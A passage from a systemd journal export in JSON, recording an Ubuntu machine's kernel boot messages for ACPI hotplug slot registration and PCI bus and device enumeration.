"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d3;b=e2b08827b5804427b422c10c84f1567e;m=558caf;t=5bd16dd190c16;x=b757a1b1a9814433", "__REALTIME_TIMESTAMP" : "1615280779889686", "__MONOTONIC_TIMESTAMP" : "5606575", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "212068", "MESSAGE" : "acpiphp: Slot [7] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d4;b=e2b08827b5804427b422c10c84f1567e;m=558cb9;t=5bd16dd190c20;x=371cfb0a26cb473a", "__REALTIME_TIMESTAMP" : "1615280779889696", "__MONOTONIC_TIMESTAMP" : "5606585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "214241", "MESSAGE" : "acpiphp: Slot [8] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d5;b=e2b08827b5804427b422c10c84f1567e;m=558cc3;t=5bd16dd190c2a;x=d7cd86ed04f23905", "__REALTIME_TIMESTAMP" : "1615280779889706", "__MONOTONIC_TIMESTAMP" : "5606595", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "216075", "MESSAGE" : "acpiphp: Slot [9] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d6;b=e2b08827b5804427b422c10c84f1567e;m=558ccd;t=5bd16dd190c34;x=109ca8f7a7b8f084", "__REALTIME_TIMESTAMP" : "1615280779889716", "__MONOTONIC_TIMESTAMP" : "5606605", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "218093", "MESSAGE" : "acpiphp: Slot [10] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d7;b=e2b08827b5804427b422c10c84f1567e;m=558cd7;t=5bd16dd190c3f;x=254b2a4852bf3ab8", "__REALTIME_TIMESTAMP" : "1615280779889727", "__MONOTONIC_TIMESTAMP" : "5606615", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "220054", "MESSAGE" : "acpiphp: Slot [11] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d8;b=e2b08827b5804427b422c10c84f1567e;m=558ce5;t=5bd16dd190c4c;x=c2d4e9cbb43a1b58", "__REALTIME_TIMESTAMP" : "1615280779889740", "__MONOTONIC_TIMESTAMP" : "5606629", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "222142", "MESSAGE" : "acpiphp: Slot [12] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d9;b=e2b08827b5804427b422c10c84f1567e;m=558cef;t=5bd16dd190c57;x=edcbddafee92b0f", "__REALTIME_TIMESTAMP" : "1615280779889751", "__MONOTONIC_TIMESTAMP" : "5606639", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "224055", "MESSAGE" : "acpiphp: Slot [13] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=da;b=e2b08827b5804427b422c10c84f1567e;m=558cf9;t=5bd16dd190c61;x=ff342f0e7778618d", "__REALTIME_TIMESTAMP" : "1615280779889761", "__MONOTONIC_TIMESTAMP" : "5606649", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "226203", "MESSAGE" : "acpiphp: Slot [14] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=db;b=e2b08827b5804427b422c10c84f1567e;m=558d06;t=5bd16dd190c6e;x=c01dbd6857ee3cbd", "__REALTIME_TIMESTAMP" : "1615280779889774", "__MONOTONIC_TIMESTAMP" : "5606662", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "228056", "MESSAGE" : "acpiphp: Slot [15] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=dc;b=e2b08827b5804427b422c10c84f1567e;m=558d11;t=5bd16dd190c78;x=1cecf41a859e0d9a", "__REALTIME_TIMESTAMP" : "1615280779889784", "__MONOTONIC_TIMESTAMP" : "5606673", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "230194", "MESSAGE" : "acpiphp: Slot [16] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=dd;b=e2b08827b5804427b422c10c84f1567e;m=558d1b;t=5bd16dd190c83;x=6f4fd28d63c8a383", "__REALTIME_TIMESTAMP" : "1615280779889795", "__MONOTONIC_TIMESTAMP" : "5606683", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "232074", "MESSAGE" : "acpiphp: Slot [17] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=de;b=e2b08827b5804427b422c10c84f1567e;m=558d25;t=5bd16dd190c8d;x=92ce5d577915cc12", "__REALTIME_TIMESTAMP" : "1615280779889805", "__MONOTONIC_TIMESTAMP" : "5606693", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "234204", "MESSAGE" : "acpiphp: Slot [18] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=df;b=e2b08827b5804427b422c10c84f1567e;m=558d2f;t=5bd16dd190c97;x=eb1e4f71c91af795", "__REALTIME_TIMESTAMP" : "1615280779889815", "__MONOTONIC_TIMESTAMP" : "5606703", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "236052", "MESSAGE" : "acpiphp: Slot [19] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e0;b=e2b08827b5804427b422c10c84f1567e;m=558d3a;t=5bd16dd190ca1;x=acdf7eb7d06d831f", "__REALTIME_TIMESTAMP" : "1615280779889825", "__MONOTONIC_TIMESTAMP" : "5606714", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "238186", "MESSAGE" : "acpiphp: Slot [20] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e1;b=e2b08827b5804427b422c10c84f1567e;m=558d44;t=5bd16dd190cab;x=922cc8b31e4c0829", "__REALTIME_TIMESTAMP" : "1615280779889835", "__MONOTONIC_TIMESTAMP" : "5606724", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "240052", "MESSAGE" : "acpiphp: Slot [21] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e2;b=e2b08827b5804427b422c10c84f1567e;m=558d4e;t=5bd16dd190cb5;x=32612c6d0dba1840", "__REALTIME_TIMESTAMP" : "1615280779889845", "__MONOTONIC_TIMESTAMP" : "5606734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "242203", "MESSAGE" : "acpiphp: Slot [22] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e3;b=e2b08827b5804427b422c10c84f1567e;m=558d6a;t=5bd16dd190cd2;x=aea19448686e6875", "__REALTIME_TIMESTAMP" : "1615280779889874", "__MONOTONIC_TIMESTAMP" : "5606762", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "244053", "MESSAGE" : "acpiphp: Slot [23] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e4;b=e2b08827b5804427b422c10c84f1567e;m=558d83;t=5bd16dd190ceb;x=b59ff18ba9e88ffb", "__REALTIME_TIMESTAMP" : "1615280779889899", "__MONOTONIC_TIMESTAMP" : "5606787", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "246254", "MESSAGE" : "acpiphp: Slot [24] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e5;b=e2b08827b5804427b422c10c84f1567e;m=558d8f;t=5bd16dd190cf7;x=b1df68348006767", "__REALTIME_TIMESTAMP" : "1615280779889911", "__MONOTONIC_TIMESTAMP" : "5606799", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "248053", "MESSAGE" : "acpiphp: Slot [25] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e6;b=e2b08827b5804427b422c10c84f1567e;m=558d9a;t=5bd16dd190d01;x=4dcb9e0ec273830f", "__REALTIME_TIMESTAMP" : "1615280779889921", "__MONOTONIC_TIMESTAMP" : "5606810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "250238", "MESSAGE" : "acpiphp: Slot [26] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e7;b=e2b08827b5804427b422c10c84f1567e;m=558dab;t=5bd16dd190d13;x=31ac93d807cba66f", "__REALTIME_TIMESTAMP" : "1615280779889939", "__MONOTONIC_TIMESTAMP" : "5606827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "252055", "MESSAGE" : "acpiphp: Slot [27] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e8;b=e2b08827b5804427b422c10c84f1567e;m=558dbc;t=5bd16dd190d24;x=ad184afb6e01a9f4", "__REALTIME_TIMESTAMP" : "1615280779889956", "__MONOTONIC_TIMESTAMP" : "5606844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "254696", "MESSAGE" : "acpiphp: Slot [28] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e9;b=e2b08827b5804427b422c10c84f1567e;m=558dd7;t=5bd16dd190d3f;x=afe1777123395e10", "__REALTIME_TIMESTAMP" : "1615280779889983", "__MONOTONIC_TIMESTAMP" : "5606871", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "256061", "MESSAGE" : "acpiphp: Slot [29] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ea;b=e2b08827b5804427b422c10c84f1567e;m=558de1;t=5bd16dd190d48;x=3f915f30eba4e271", "__REALTIME_TIMESTAMP" : "1615280779889992", "__MONOTONIC_TIMESTAMP" : "5606881", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "258131", "MESSAGE" : "acpiphp: Slot [30] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=eb;b=e2b08827b5804427b422c10c84f1567e;m=558dfa;t=5bd16dd190d62;x=25bff900685e8418", "__REALTIME_TIMESTAMP" : "1615280779890018", "__MONOTONIC_TIMESTAMP" : "5606906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "260055", "MESSAGE" : "acpiphp: Slot [31] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ec;b=e2b08827b5804427b422c10c84f1567e;m=558e04;t=5bd16dd190d6b;x=362eeb39cc63ada1", "__REALTIME_TIMESTAMP" : "1615280779890027", "__MONOTONIC_TIMESTAMP" : "5606916", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "262384", "MESSAGE" : "PCI host bridge to bus 0000:00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ed;b=e2b08827b5804427b422c10c84f1567e;m=558e88;t=5bd16dd190df0;x=d8bbcd0964c6b88c", "__REALTIME_TIMESTAMP" : "1615280779890160", "__MONOTONIC_TIMESTAMP" : "5607048", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "264008", "MESSAGE" : "pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ee;b=e2b08827b5804427b422c10c84f1567e;m=558f03;t=5bd16dd190e6b;x=e61b00e29112adb0", "__REALTIME_TIMESTAMP" : "1615280779890283", "__MONOTONIC_TIMESTAMP" : "5607171", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "267267", "MESSAGE" : "pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ef;b=e2b08827b5804427b422c10c84f1567e;m=558f82;t=5bd16dd190eea;x=ac0fa8a1df325f3e", "__REALTIME_TIMESTAMP" : "1615280779890410", "__MONOTONIC_TIMESTAMP" : "5607298", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "268006", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f0;b=e2b08827b5804427b422c10c84f1567e;m=558feb;t=5bd16dd190f52;x=8a9860fa2fdb0675", "__REALTIME_TIMESTAMP" : "1615280779890514", "__MONOTONIC_TIMESTAMP" : "5607403", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "271763", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x80000000-0xfebfffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f1;b=e2b08827b5804427b422c10c84f1567e;m=559089;t=5bd16dd190ff1;x=ca588a5d05c5e3a", "__REALTIME_TIMESTAMP" : "1615280779890673", "__MONOTONIC_TIMESTAMP" : "5607561", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "272007", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x100000000-0x17fffffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f2;b=e2b08827b5804427b422c10c84f1567e;m=559118;t=5bd16dd19107f;x=248c379e0cd43533", "__REALTIME_TIMESTAMP" : "1615280779890815", "__MONOTONIC_TIMESTAMP" : "5607704", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "275812", "MESSAGE" : "pci_bus 0000:00: root bus resource [bus 00-ff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f3;b=e2b08827b5804427b422c10c84f1567e;m=5591da;t=5bd16dd191141;x=ecd27e88c67f76bf", "__REALTIME_TIMESTAMP" : "1615280779891009", "__MONOTONIC_TIMESTAMP" : "5607898", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:00.0", "_UDEV_SYSNAME" : "0000:00:00.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "276064", "MESSAGE" : "pci 0000:00:00.0: [8086:1237] type 00 class 0x060000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f4;b=e2b08827b5804427b422c10c84f1567e;m=55d23a;t=5bd16dd1951a2;x=9ccf81605d5f9c41", "__REALTIME_TIMESTAMP" : "1615280779907490", "__MONOTONIC_TIMESTAMP" : "5624378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "276813", "MESSAGE" : "pci 0000:00:01.0: [8086:7000] type 00 class 0x060100" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f5;b=e2b08827b5804427b422c10c84f1567e;m=55d2d6;t=5bd16dd19523d;x=60d223400918274a", "__REALTIME_TIMESTAMP" : "1615280779907645", "__MONOTONIC_TIMESTAMP" : "5624534", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "277719", "MESSAGE" : "pci 0000:00:01.1: [8086:7010] type 00 class 0x010180" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f6;b=e2b08827b5804427b422c10c84f1567e;m=55d372;t=5bd16dd1952d9;x=dd7e66bae818543a", "__REALTIME_TIMESTAMP" : "1615280779907801", "__MONOTONIC_TIMESTAMP" : "5624690", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "280911", "MESSAGE" : "pci 0000:00:01.1: reg 0x20: [io 0xc0c0-0xc0cf]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f7;b=e2b08827b5804427b422c10c84f1567e;m=55d435;t=5bd16dd19539d;x=f8e2ac9466ff5f98", "__REALTIME_TIMESTAMP" : "1615280779907997", "__MONOTONIC_TIMESTAMP" : "5624885", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "282217", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f8;b=e2b08827b5804427b422c10c84f1567e;m=55d4e3;t=5bd16dd19544a;x=a17099c37dea2ab9", "__REALTIME_TIMESTAMP" : "1615280779908170", "__MONOTONIC_TIMESTAMP" : "5625059", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "284007", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f9;b=e2b08827b5804427b422c10c84f1567e;m=55d569;t=5bd16dd1954d0;x=3778f35692f3b203", "__REALTIME_TIMESTAMP" : "1615280779908304", "__MONOTONIC_TIMESTAMP" : "5625193", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : 